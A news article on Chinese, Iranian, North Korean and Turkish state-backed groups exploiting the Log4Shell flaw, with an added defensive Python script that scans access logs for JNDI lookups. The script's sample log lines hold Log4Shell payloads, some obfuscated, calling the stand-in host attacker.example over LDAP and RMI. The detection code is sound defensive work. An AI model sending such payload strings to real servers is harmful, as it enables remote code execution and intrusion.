16 December 2021

Microsoft: State-sponsored hackers from China, Iran, North Korea and Turkey target the Log4Shell bug


State-sponsored hacker groups from China, Iran, North Korea and Turkey have been spotted exploiting the recently disclosed CVE-2021-44228 vulnerability (aka “Log4Shell”) in the Log4j logging utility to gain access to enterprise networks.

CVE-2021-44228 is a remote code injection vulnerability that exists due to improper input validation when processing LDAP requests and could be abused by threat actors to hijack servers and apps over the internet. The disclosure of the flaw caused widespread alarm because Log4j is widely used in commonly deployed enterprise systems. The flaw affects all versions of Log4j from 2.0-beta9 (released in September 2013) to 2.14.1 (March 2021).
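As an added example (not part of the original article), the following Python check scans web-server access-log lines for the lookup string that makes a vulnerable Log4j instance issue the LDAP (or RMI) request described above, after collapsing the wrapper lookups that are commonly used to disguise it; the log lines, addresses and hostnames are constructed.

```python
import re
from typing import List, Optional, Tuple

# Log4j expands ${...} lookups while formatting a log message; a ${jndi:...}
# lookup makes the server fetch a remote object (LDAP, RMI, ...), which is the
# root of CVE-2021-44228. Two wrapper forms are collapsed before matching:
#   ${lower:X} / ${upper:X}  -> X
#   ${anything:-X}           -> X   (default-value syntax, e.g. ${::-j})
_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse nested wrapper lookups until the text stops changing."""
    for _ in range(max_rounds):
        new = _WRAPPER.sub(lambda m: m.group(1), text)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_jndi(line: str) -> Optional[str]:
    """Return the JNDI scheme (ldap, rmi, ...) if the line carries a lookup."""
    match = _JNDI.search(normalize(line))
    return match.group(1).lower() if match else None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, scheme) for every line that carries a lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        scheme = find_jndi(line)
        if scheme:
            hits.append((number, scheme))
    return hits


# Constructed access-log lines; addresses and hostnames are placeholders.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://attacker.example/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.11 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c}"',
]

if __name__ == "__main__":
    for number, scheme in scan(SAMPLE_LOG):
        print(f"line {number}: jndi lookup via {scheme}")
```

A hit only shows that an exploitation attempt reached the server; whether it succeeded depends on the Log4j version and configuration behind the logged endpoint.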

This week, the Apache Software Foundation (ASF) released a new fix for the Log4j logging utility after it was found that the previous patch “was incomplete in certain non-default configurations.”

As Microsoft noted in an update on its Log4Shell guidance blog post, “this activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve the actor’s objectives.”

Threat actors linked to the Log4Shell attacks include the Iran-linked APT group known as PHOSPHORUS, and HAFNIUM, a state-backed hacker group believed to have ties to the Chinese government. Microsoft did not name the threat groups operating out of North Korea and Turkey.

“MSTIC has observed PHOSPHORUS, an Iranian actor that has been deploying ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications,” the tech giant noted.

As for HAFNIUM, the group has been observed abusing the flaw to attack virtualization infrastructure.

“In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems,” Microsoft said.

Furthermore, multiple groups acting as access brokers have also been observed leveraging Log4Shell to gain initial access to target networks. These access brokers then sell access to these networks to ransomware-as-a-service affiliates. Exploitation attempts were observed on both Windows and Linux systems, Microsoft said.

On Monday, security firm Bitdefender warned of a first ransomware group leveraging the Log4Shell flaw to deploy a new ransomware strain called “Khonsari” on unpatched systems.